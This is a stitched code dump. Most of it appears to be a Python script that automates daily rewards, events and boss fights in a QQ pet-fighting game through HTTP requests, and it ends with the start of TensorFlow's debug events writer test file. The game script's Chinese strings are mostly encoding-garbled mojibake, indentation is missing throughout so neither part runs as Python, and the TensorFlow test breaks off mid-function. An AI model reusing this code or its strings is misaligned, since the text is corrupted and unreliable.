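#     "108": lambda log: shiergong(log),    # zodiac dungeon
# }
# def run_daily_task(task_id, log):
#     handler = DAILY_TASK_HANDLERS.get(task_id)
#     if handler is not None:
#         handler(log)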
def wulinmengzhu(id, log):
"""
ๆญฆๆ็ไธป
:param id: ๆฅๅๆญฆๆ็ไธป็็ฑปๅ 1-้ป้ 2-็ฝ้ถ 3-้้
:return:
"""
wulinmengzhuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=view_index"
wulinmengzhulingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&round_id=%(round_id)s&op=get_award§ion_id=%(section_id)s"
wulinemenzhubaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=signup&ground_id=%(ground_id)s"
wulinmengzhujiangcaixuanze = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=guess_up&index=%(index)s"
wulinmengzhujiangcaiqueren = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=comfirm"
# Claim guess (竞猜) rewards
j = requestURL(wulinmengzhuchaxun)
# print(j)
award_info = j.get("award_info")
rest_time = j.get("rest_time")
if award_info != "":
section_id = award_info[0].get("section_id")
round_id = award_info[0].get("round_id")
j = requestURL(wulinmengzhulingjiang % {"round_id": str(round_id), "section_id": section_id})
msg = j.get("msg")
log.info("ๆญฆๆ็ไธป้ขๅฅ๏ผ" + msg)
if not str(rest_time.get("is_final")).startswith("1"):
if dayOfWeek in [1, 3, 5] and 12 <= hour < 24:
# sign up
j = requestURL(wulinemenzhubaoming % {"ground_id": str(id)})
msg = j.get("msg")
log.info("ๆญฆๆ็ไธปๆฅๅ๏ผ" + msg)
elif dayOfWeek in [2, 4, 6] and 12 <= hour < 21:
# pick all eight guesses
for i in range(8):
j = requestURL(wulinmengzhujiangcaixuanze % {"index": str(i)})
# confirm the guesses
j = requestURL(wulinmengzhujiangcaiqueren)
msg = j.get("msg")
log.info("ๆญฆๆ็ไธป็ซ็๏ผ" + msg)
def yuanzhengjun(log):
"""
ๅธฎๆดพ่ฟๅพๅ
:param log:
:return:
"""
yuanzhengjundaoyuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=viewIndex&island_id=%(island_id)s" # 0-4
yuanzhengjunlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=getPointAward&point_id=%(point_id)s" # 0-14
yuanzhengjundaoyulingjinag = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=getIslandAward&island_id=%(island_id)s" # 0-4
# https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&point_id=0&op=getPointAward
for i in range(5):
j = requestURL(yuanzhengjundaoyuchaxun % {"island_id": str(i)})
fightInfo = j.get("fightInfo")
if fightInfo is None or fightInfo == "":
continue
islandAwardStatus = fightInfo.get("islandAwardStatus")  # 0 - not claimable, 1 - claimable, 2 - already claimed
islandInfo = fightInfo.get("islandInfo")
for ii in range(3):
island0 = islandInfo[ii]
if island0.get("awardStatus") == "1":
# claim this point's reward
j = requestURL(yuanzhengjunlingjiang % {"point_id": str(i * 3 + ii)})
msg = j.get("msg")
log.info("ๅธฎๆดพ่ฟๅพๅ๏ผๅฒๅฑฟ" + str(i + 1) + "-" + str(ii + 1) + "้ขๅฅ" + msg)
if str(islandAwardStatus) == str(1):
j = requestURL(yuanzhengjundaoyulingjinag % {"island_id": str(i)})
msg = j.get("msg")
log.info("ๅธฎๆดพ่ฟๅพๅ๏ผๅฒๅฑฟ" + str(i + 1) + "-" + "4้ขๅฅ " + msg)
def liumenhuiwu(log):
"""
ๅ
ญ้จไผๆญฆ
:param log:
:return:
"""
huiwuzhuweichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=showcheer"
huiwuzhuwei = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee§=1003&op=cheer"
huiwushilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=dotraining"
huiwulingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=drawreward"
# todo: skip this feature when the level is below 40
# Cheering runs from Monday 06:00 to Friday 06:00
j = requestURL(huiwuzhuweichaxun)  # defaults to cheering for 丐帮
cheer_sect = j.get("cheer_sect")
if (dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 5 and hour < 6) or dayOfWeek in [2, 3, 4] or str(
cheer_sect).startswith("0"):
j = requestURL(huiwuzhuwei)
msg = j.get("msg")
if not str(msg).startswith("ๆฌๅจๅทฒไธบ้จๆดพๅฉๅจ"):
log.info("ๅ
ญ้จไผๆญฆ-ๅฉๅจ๏ผ" + msg)
if dayOfWeek in [1, 6, 7]:
j = requestURL(huiwulingjiang)
msg = j.get("msg")
log.info("ไผๆญฆ-้ขๅฅ๏ผ" + msg)
# Tournament trials
# todo: check the trial-letter stock and auto-exchange one when short
# fight
for i in range(20):
j = requestURL(huiwushilian)
msg = j.get("msg")
log.info("ๅ
ญ้จไผๆญฆ-่ฏ็ผ๏ผ" + msg)
if str(msg).startswith("ไฝ ๅทฒ่พพไปๆฅๆๆไธ้") or str(msg).startswith("ๅฝๅๆถๆฎตไธ่ฝ่ฟ่ก่ฏฅๆไฝ"):
break
def huiliu(log, qqnum="-1"):
"""
ๅๆตๅฅฝๅๅฌๅ
:param log:
:param qqnum: ไธๅกซ้ป่ฎคไธบ-1๏ผ้ๆบๅฌๅค
:return:
"""
huiliuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=3"
huiliulibao1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=6&gift=2"
huiliulibao2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=6&gift=3"
huiliuzhaohuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=4&opuin=%(opuin)s"
j = requestURL(huiliuchaxun)
msg = j.get("msg")
# if str(msg).startswith("ๅพๆฑๆญ๏ผ็ณป็ป็นๅฟ"):
# return
daycallnum = j.get("daycallnum")
canbecall = j.get("canbecall")
bind = j.get("bind")
if len(bind) > 0:
j = requestURL(huiliulibao1)
msg = j.get("msg")
log.info("ๅๆต-็ญๅฟๅฉไบบ็คผๅ
๏ผ" + msg)
j = requestURL(huiliulibao2)
msg = j.get("msg")
log.info("ๅๆต-่ฑชๆ
ๅฟซๆ็คผๅ
๏ผ" + msg)
times = 3 - int(daycallnum)
if int(times) == 0:
pass
elif len(canbecall) > 0:
if qqnum == "-1":
qqnum = canbecall[0].get("uin")
# start summoning
for i in range(times):
j = requestURL(huiliuzhaohuan % {"opuin": str(qqnum)})
msg = j.get("msg")
log.info("ๅๆตๅฌๅ๏ผ" + msg)
else:
pass
# bossID reference. The boss names in the original comment were lost to encoding
# damage; the id groups it listed are: 2-7 and 9; 10-19 (ids 12, 14, 15, 16 and
# 19 also appear in meirirenwuzhixing above); 31, 32, 33; 150-156.
def tiaozhanboss(log, qqnum):
"""
ๆๆboss
:param log:
:param qqnum:
:return:
"""
chakanhaoyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=1&sub=1&selfuin=%(selfuin)s"
zhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s"
ledoujiluchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=2&sub=1&selfuin=%(selfuin)s"
chakanbangyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=viewmember"
zhandoubangpai = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&uin=%(uin)s"
chakanjiebaixialv = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=viewxialv"
zhandoujiebaixialvboss = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=fight&B_UID=%(B_UID)s"
# fetch the friend list; boss accounts have uin < 10000
j = requestURL(chakanhaoyou % {"selfuin": str(qqnum)})
info = j.get("info")
for i in range(10):
enable = info[i].get("enable")
uin = info[i].get("uin")
if str(enable).startswith("1") and int(uin) < 10000:
requestURL(zhandou % {"puin": str(uin)})  # the response seems to carry no record; read the newest fight-log entry instead
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
ledoujilu = j.get("info")
if len(ledoujilu) > 0:
desc = ledoujilu[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
# Faction bosses. todo: first check that the player actually has a faction
j = requestURL(chakanbangyou)
msg = j.get("msg")
if str(msg).startswith("ๅพๆฑๆญ"):
pass
else:
level = j.get("level")
bosslist = j.get("list")
for i in range(1, int(level) + 1):
fight = bosslist[i].get("fight")
if str(fight).startswith("1"):
uin = bosslist[i].get("uin")
requestURL(zhandoubangpai % {"uin": str(uin)})
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
info = j.get("info")
if len(info) > 0:
desc = info[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
# Sworn-brother and couple bosses
response = req.get(chakanjiebaixialv)
html = response.content.decode("utf-8")
# pattern = re.compile('B_UID=[1-9]\d*>ไนๆ')
pattern = re.compile('B_UID=[1-9]\d*&page=&type=10">乐斗')
bossList = pattern.findall(html)
bossList = list(set(bossList))
newlist = []
for i in bossList:
id = str(i).replace("B_UID=", "").replace("&page=&type=10\">乐斗", "")
if int(id) < 10000:
newlist.append(id)
if len(newlist) > 0:
for i in newlist:
response = req.get(zhandoujiebaixialvboss % {"B_UID": str(i)})
html = response.content.decode("utf-8")
if "ไฝฟ็จ่งๅ" in str(html):
continue
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
info = j.get("info")
if len(info) > 0:
desc = info[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
def shengri(log):
"""
็ๆฅ
:param log:
:return:
"""
shengrichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday"
shengrilingjiang1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getfreepresent"
shengrilingjiang2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getwishespresent"
shengrishuaxin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getrandomfriends"
shengriyouhaodulibao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getwishdegreepresent"
shengrifasongzhufu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=sendwishes&receiver=%(receiver)s"
# 1. Birthday wishes. todo: check whether the birthday reward was already claimed
j = requestURL(shengrichaxun)  # check whether the birthday week is active
in_event = j.get("in_event")
received_wishes_num = j.get("received_wishes_num")  # wishes received so far
wishes_required = j.get("wishes_required")  # wishes needed for the birthday reward
wish_degree = j.get("wish_degree")  # current friendliness
wish_degree_required = j.get("wish_degree_required")  # friendliness needed for the pack
num = int(wish_degree_required) - int(wish_degree)
# claim rewards while the birthday event is active
if str(in_event).startswith("1"):
j = requestURL(shengrilingjiang1)
msg = j.get("msg")
log.info("็ๆฅ-ไธๅฑๅคง็คผ๏ผ" + msg)
if int(received_wishes_num) >= int(wishes_required):  # wish pack (rune stone + lucky stone + gold scroll)
j = requestURL(shengrilingjiang2)
msg = j.get("msg")
log.info("็ๆฅ-็ฅ็ฆๅคง็คผ๏ผ" + msg)
# Everyday friend-birthday wishes
newlist = []
for i in range(10):
j = requestURL(shengrishuaxin)  # refresh the candidate list
friends = j.get("friends")
for friend in friends:
can_send_wishes = friend.get("can_send_wishes")
if str(can_send_wishes).startswith("1"):
newlist.append(friend.get("uin"))
wishlist = list(set(newlist))
for qqnum in wishlist:
# send wishes; claim the friendliness pack each time the counter reaches zero
if num == 0:
j = requestURL(shengriyouhaodulibao)
msg = j.get("msg")
log.info("生日-友好度礼包：" + msg)
num = int(wish_degree_required)
else:
j = requestURL(shengrifasongzhufu % {"receiver": str(qqnum)})
msg = j.get("msg")
log.info("็ๆฅ-็ฅ็ฆ๏ผ" + msg)
if str(msg).startswith("ๆๅๅ้็ฅ็ฆ"):
num = num - 1
def meirijiangli(log):
"""
ๆฏๆฅๅฅๅฑ
:param log:
:return:
"""
meirijianglichakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dailygift"
meirijianglilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dailygift&op=draw&key=%(key)s"
j = requestURL(meirijianglichakan)
meridian = j.get("meridian")  # power-transfer charm pack
login = j.get("login")  # daily login pack
daren = j.get("daren")  # VIP (daren) pack
wuzitianshu = j.get("wuzitianshu")  # wordless tome pack
for item in [meridian, login, daren, wuzitianshu]:
if str(item.get("status")).startswith("0"):
j = requestURL(meirijianglilingjiang % {"key": str(item.get("key"))})
msg = j.get("msg")
log.info("ๆฏๆฅๅฅๅฑ:" + msg)
def doudouyueka(username, log):  # todo: proper HTML page parsing
"""
Doudou monthly card (斗豆月卡) reward
:param username:
:param log:
:return:
"""
yuakachaxun = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&B_UID=0&sid=&channel=0&g_ut=1&cmd=monthcard"
yuakalingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=use&id=3645&selfuin=%(selfuin)s"
response = req.get(yuakachaxun)
html = response.content.decode("utf-8")
if (str(html).find("还未开通斗豆月卡")) == -1:
j = requestURL(yuakalingjiang % {"selfuin": str(username)})
msg = j.get("msg")
log.info("ๆ่ฑๆๅก๏ผ" + msg)
# todo: micro-client (微端) support
def yaoqing(log):
"""
้่ฏท
:param log:
:return:
"""
yaoqingchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=4"
yaoqingfenxiang1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=6&inviteNum=5"
yaoqingfenxiang2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=6&inviteeKind=1&inviteNum=1"
yaoqingchoujiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=5"
j = requestURL(yaoqingchaxun)
inviteNum = j.get("inviteNum")
inviteQQGroupNum = j.get("inviteQQGroupNum")
if int(inviteNum) < 5:
j = requestURL(yaoqingfenxiang1)
# msg = j.get("msg")
# log.info("้่ฏท-ๅไบซ๏ผ" + msg)
if int(inviteQQGroupNum) < 1:
j = requestURL(yaoqingfenxiang2)
# msg = j.get("msg")
# log.info("้่ฏท-ๅไบซ๏ผ" + msg)
for i in range(2):
j = requestURL(yaoqingchoujiang)
msg = j.get("msg")
if not str(msg).startswith("ไปๅคฉๅทฒ็ปๆฝ่ฟ2ๆฌกๅฅไบ"):
log.info("้่ฏท-ๆฝๅฅ๏ผ" + msg)
def liwu(log):
"""
ๅ
่ดน็คผ็ฉ๏ผไผๅ
ๅ่ต ๏ผ
:param log:
:return:
"""
liwuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=msg"
liwushouqu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=receive&id=%(id)s"
liwuhuizeng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=sendback&recipient=%(recipient)s"
liwuzengsong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=reply&id=%(id)s"
j = requestURL(liwuchaxun)
notifications = j.get("notifications")
giftin = []  # gifts waiting to be collected
giftout = []  # gifts waiting to be returned
for item in notifications:
if str(item.get("type")).startswith("1"):
giftin.append(item)
else:
giftout.append(item)
for item in giftin:
j = requestURL(liwushouqu % {"id": str(item.get("id"))})  # collect the gift
if j is None:
continue
# print(item.get("id"))
msg = j.get("msg")
if str(msg).startswith("ๆพไธๅฐๅฏนๅบ็ๆถๆฏ"):
continue
elif str(msg).startswith("ไปๆฅๆถๅๆฌกๆฐๅทฒ่พพไธ้"):
break
else:
log.info("็คผ็ฉ-ๆถๅ๏ผ" + msg)
j = requestURL(liwuhuizeng % {"recipient": str(item.get("uin"))})  # return the favour
msg = j.get("msg")
log.info("礼物-回赠：" + msg)
for item in giftout:
j = requestURL(liwuzengsong % {"id": str(item.get("id"))})  # send a gift
if j is None:
continue
msg = j.get("msg")
if str(msg).startswith("ไปๅคฉๅทฒ็ป็ปไป้่ฟ็คผ็ฉๅฆ"):
continue
elif str(msg).startswith("ไปๆฅ่ต ้ๆฌกๆฐๅทฒ่พพไธ้"):
break
else:
log.info("็คผ็ฉ-่ต ้๏ผ" + msg)
def shanghui(log):
"""
ๅไผ todo 1.่ชๅฎไนไบคๆๅ
ๆขๅ่กจ 2.็กฌๅธไฝไบๆไธชๆฐๅผๅไธๅ
ๆข
:param log:
:return:
"""
shanghuibaoku = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=0&page=1"
shanghuilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=3&type=%(type)s&giftId=%(giftId)s"
shanghuijiaoyichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=1"
shanghuijiaoyi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=4&type=%(type)s&goods_id=%(goods_id)s"
shanghuiduihuanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=2"
shanghuiduihuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=5&type_id=%(type_id)s"
# 1. Claim guild gifts
while True:
j = requestURL(shanghuibaoku)
giftInfo = j.get("giftInfo")
if giftInfo is None:
continue
if len(giftInfo) == 0:
break
for item in giftInfo:
gifttype = item.get("type")
giftid = item.get("giftId")
j = requestURL(shanghuilingjiang % {"type": str(gifttype), "giftId": giftid})
msg = j.get("msg")
if str("msg").startswith("ๅ
ฅๅธฎ24ๅฐๆถๆ่ฝ้ขๅๅไผ็คผๅ
"):
break
log.info("ๅไผ-้ขๅฅ๏ผ" + msg)
# 2. Trade
j = requestURL(shanghuijiaoyichaxun)
tradeInfo = j.get("tradeInfo")
for item in tradeInfo:
if str(item.get("isTraded")).startswith("0"):
if int(item.get("goodsId")) in [3374, 3487]:
gifttype = item.get("type")
goodsid = item.get("goodsId")
j = requestURL(shanghuijiaoyi % {"type": str(gifttype), "goods_id": goodsid})
msg = j.get("msg")
log.info("ๅไผ-ไบคๆ๏ผ" + msg)
# 3. Exchange
j = requestURL(shanghuiduihuanchaxun)
coinNum = j.get("coinNum")
if int(coinNum) <= 1000:
pass  # keep a coin reserve; skip exchanging
else:
exchangeInfo = j.get("exchangeInfo")
for item in exchangeInfo:
if str(item.get("isExchanged")).startswith("0") and int(coinNum) >= int(item.get("coinNum")):
if int(item.get("goodsId")) in []:
# ๅ
ๆข
j = requestURL(shanghuiduihuan % {"type_id": str(item.get("typeId"))})
msg = j.get("msg")
log.info("ๅไผ-ๅ
ๆข๏ผ" + msg)
coinNum = coinNum - item.get("coinNum")
else:
pass  # not on the exchange list
def bangpairenwu(username, log):
"""
ๅธฎๆดพไปปๅก
:param username:
:param log:
:return:
"""
global flag
bangpairenwuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&sub=1"
bangpairenwuwancheng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&taskid=%(taskid)s&sub=2"
j = requestURL(bangpairenwuchaxun)
tasklist = j.get("array")
tasklisttodo = []
tasklistdone = []
for task in tasklist:
if str(task.get("state")).startswith("0"):
tasklisttodo.append(task)
elif str(task.get("state")).startswith("1"):
tasklistdone.append(task)
else:
continue
for task in tasklisttodo:
if int(task.get("id")) == 1:
# ๅธฎๆดพไพๅฅ:ๅๅฎๆค็ฅไปปๆไพๅฅ1ไธช็ฉๅใ(ไพๅฅ่ฟ้ญไธน)
gongfeng(log, 3089)
elif int(task.get("id")) == 8 or int(task.get("id")) == 9:
# ๅธฎๆดพไฟฎ็ผ:่ฟ่กไธ/ไธๆฌกๅธฎๆดพไฟฎ็ผ
a = 1 if int(task.get("id"))==8 else 3
for i in range(1, a+1):
flag = bangpaixiulian(log)
if flag:
continue
elif int(task.get("id")) == 10:
# ๆฅ็็ฟๆด:่ฟๅ
ฅ็ฟๆด็้ข๏ผๆฅ็ๆฌๅธฎๆดพ็ฟๆด่ฏฆๆ
kuangdongchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine"
requestURL(kuangdongchakan)
elif int(task.get("id")) == 11:
# ๆฅ็ๅธฎ่ดก:็นๅป่ดก็ฎๅบฆๆฅ่ฏข๏ผๆฅ็่ชๅทฑๅจๅธฎๆดพไธญ็ๆๅ
gongxianchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&sub=3"
requestURL(gongxianchaxun)
elif int(task.get("id")) == 12 or int(task.get("id")) == 14:
# ๆฅ็ๅธฎๆ:่ฟๅ
ฅๅธฎๆดพๆไบ็้ข๏ผๆฅ็ๆฌๅธฎ่ตๅบๆๅตใ/่ฟๅ
ฅๅธฎๆดพๆไบ็้ข๏ผๆฅ็ๆฌๅธฎ่ตๅบ็ๆปๅ ๅๆๅต
bangzhanchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=facwarrsp&id=1"
requestURL(bangzhanchakan)
elif int(task.get("id")) == 13:
# ็ฒฎ่ๆ ๅคบ:่ฟๅ
ฅ็ฒฎ่ๆ ๅคบๆ็้ข๏ผๆฅ็ๆฌๅธฎๆๆ็ถๅตใ
liangcaochakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war"
requestURL(liangcaochakan)
elif int(task.get("id")) == 15:
# ๅ ้่ดก็ฎ:ไฝฟ็จ1ๆฌก่ดก็ฎ่ฏๆฐดใ
shiyongwupin(username, "3038", log)
elif int(task.get("id")) == 16:
# ๆฅ็่ฆ้ป:็นๅปๅธฎๆดพ่ฆ้ป๏ผๆฅ็ๅธฎๆดพๆ่ฟๅจๆใ
bangpaiyaowen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionstaff&page=1"
requestURL(bangpaiyaowen)
tasklistdone.append(task)
for task in tasklistdone:
j = requestURL(bangpairenwuwancheng % {"taskid": task.get("id")})
msg = j.get("msg")
log.info("ๅธฎๆดพ-ไปปๅก๏ผ" + msg)
def bangpaixiulian(log):
"""
ๅธฎๆดพๆ่ฝไฟฎ็ผ
:param log:
:return:
"""
bangpaixiulian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontrain&type=2&id=%(id)s&times=1"
bangpaijinengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontrain&type=1"
j = requestURL(bangpaijinengchaxun)
skilllist = j.get("array")
for skill in skilllist:
j = requestURL(bangpaixiulian % {"id": str(skill.get("id"))})
msg = j.get("msg")
if str(msg).startswith("ๆ่ฝ็ป้ชๅขๅ "):
# arr = j.get("array")
# index = int(list.index(skill))
# skill = arr[index]
log.info("ๅธฎๆดพ-ไฟฎ็ผ๏ผไฟฎ็ผ" + str(skill.get("name")) + "," + str(msg) + str(skill.get("cur_lvl_exp")))
return True
return False
def bangpaijitan(log):
"""
ๅธฎๆดพ็ฅญๅ todo ้ๅ
ณ้ขๅฅ
:param log:
:return:
"""
jitanchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar"
jitanzhuanpan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=spinwheel"
showtarget = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=showspecialtargets"
rob = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&id=%(id)s&op=rob"
steal = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&id=%(id)s&op=steal"
jitanlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=drawreward"
j = requestURL(jitanchakan)
last_reward_points = j.get("last_reward_points")
if int(last_reward_points)>0:
j = requestURL(jitanlingjiang)
msg = j.get("msg")
log.info("็ฅญๅ-้ขๅฅ๏ผ" + msg)
while True:
j = requestURL(jitanchakan)
left_free_wheel_times = j.get("left_free_wheel_times")
if int(left_free_wheel_times) == 0:
break
print("祭坛剩余免费次数：" + left_free_wheel_times)
j = requestURL(jitanzhuanpan)
action_id = j.get("action_id")
if str(action_id) in ["1000", "1001", "1002", "1005", "1006", "1007", "1008"]:
msg = j.get("msg")
log.info("ๅธฎๆดพ็ฅญๅ-่ฝฌ็๏ผ" + str(msg))
elif str(action_id) == "1003":
j = requestURL(showtarget)
randomfac = j.get("random_faction")
enemieslist = j.get("enemies")
revengelist = j.get("revenge_targets")
steallist = enemieslist + revengelist
steallist.append(randomfac)
# priority: declared enemies > revenge targets > random faction
for enemy in steallist:
j = requestURL(rob % {"id": str(enemy.get("id"))})
msg = j.get("msg")
if str(msg).startswith("่ฏฅๅธฎๆดพๆญฃๅคไบไฟๆคไธญ"):
continue
else:
log.info("ๅธฎๆดพ็ฅญๅ-ๆ ๅคบ๏ผ" + str(msg))
break
elif str(action_id) == "1004":
j = requestURL(showtarget)
randomfac = j.get("random_faction")
enemieslist = j.get("enemies")
revengelist = j.get("revenge_targets")
steallist = enemieslist + revengelist
steallist.append(randomfac)
# priority: declared enemies > revenge targets > random faction
for enemy in steallist:
j = requestURL(steal % {"id": str(enemy.get("id"))})
msg = j.get("msg")
if str(msg).startswith("่ฏฅๅธฎๆดพๆญฃๅคไบไฟๆคไธญ"):
continue
else:
log.info("ๅธฎๆดพ็ฅญๅ-ๅทๅ๏ผ" + str(msg))
break
else:
continue
def jingjichang(log):
"""
็ซๆๅบ todo 1.ๆๆ 2.่ตๅญฃๆซ้ขๅฅ 3.่ชๅจๅ
ๆข 4.ๆ่กๆฆๅฅๅฑ
:param log:
:return:
"""
jingjichangchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=arena"
jingjichaangmeirijiangli = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=arena&op=dailyreward"
j = requestURL(jingjichangchaxun)
rest_time = j.get("rest_time")
left_free_times = j.get("left_free_times")
if int(rest_time) > 0:
pass  # todo: fights
# claim the daily reward
j = requestURL(jingjichangchaxun)
can_draw_daily_reward = j.get("can_draw_daily_reward")
if str(can_draw_daily_reward) == "1":
j = requestURL(jingjichaangmeirijiangli)
msg = j.get("msg")
log.info("็ซๆๅบ-้ขๅฅ๏ผ" + msg)
def sendmsg():
pass
def parser(response):
"""
่งฃๆ่ฟๅ็jsonๅญ็ฌฆไธฒ
:param response:
:return:
"""
html = response.content.decode("gbk", 'ignore')
# strip literal "\n" sequences and stray backslashes the server injects before JSON parsing
html = html.replace("\\n", "").replace("\\", "")
j = json.loads(html)
return j
def requestURL(url):
"""
PC็ซฏ่ฏทๆฑๆฅๅฃ๏ผ่ฟๅjson
:param url:
:return:
"""
for times in range(10):
response = req.get(url)
retjson = parser(response)
# result codes: -5 login expired, -2 server busy, 0 ok
if str(retjson.get("result")).startswith("-5"):
print("登陆校验失败")  # not logged in; abort the whole process
sys.exit()
elif str(retjson.get("result")).startswith("-2"):
# requests came too fast; back off one second and retry
sleep(1)
continue
else:
return retjson
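# --- Hedged usage note (not part of the original script) ---
# requestURL() retries up to 10 times on result -2 (server busy) and terminates
# the process on -5 (login expired); if every retry hits -2 it falls through and
# implicitly returns None, which is why some callers guard with "is not None".
#
# j = requestURL("https://fight.pet.qq.com/cgi-bin/petpk?cmd=dailygift")
# if j is not None:
#     print(j.get("msg"))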
|
debug_events_writer_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the debug events writer Python class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json as json_lib
import os
import threading
import time
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_writer
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
class DebugEventsWriterTest(dumping_callback_test_lib.DumpingCallbackTestBase):
def testMultiThreadedConstructorCallWorks(self):
def init_writer():
debug_events_writer.DebugEventsWriter(self.dump_root)
num_threads = 4
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=init_writer)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify that there is only one debug event file of each type.
metadata_paths = glob.glob(os.path.join(self.dump_root, "*.metadata"))
self.assertEqual(len(metadata_paths), 1)
source_files_paths = glob.glob(
os.path.join(self.dump_root, "*.source_files"))
self.assertEqual(len(source_files_paths), 1)
stack_frames_paths = glob.glob(
os.path.join(self.dump_root, "*.stack_frames"))
self.assertEqual(len(stack_frames_paths), 1)
graphs_paths = glob.glob(os.path.join(self.dump_root, "*.graphs"))
self.assertEqual(len(graphs_paths), 1)
self._readAndCheckMetadataFile()
def testWriteSourceFilesAndStackFrames(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_protos = 10
for i in range(num_protos):
source_file = debug_event_pb2.SourceFile()
source_file.file_path = "/home/tf2user/main.py"
source_file.host_name = "machine.cluster"
source_file.lines.append("print(%d)" % i)
writer.WriteSourceFile(source_file)
stack_frame = debug_event_pb2.StackFrameWithId()
stack_frame.id = "stack_%d" % i
stack_frame.file_line_col.file_index = i * 10
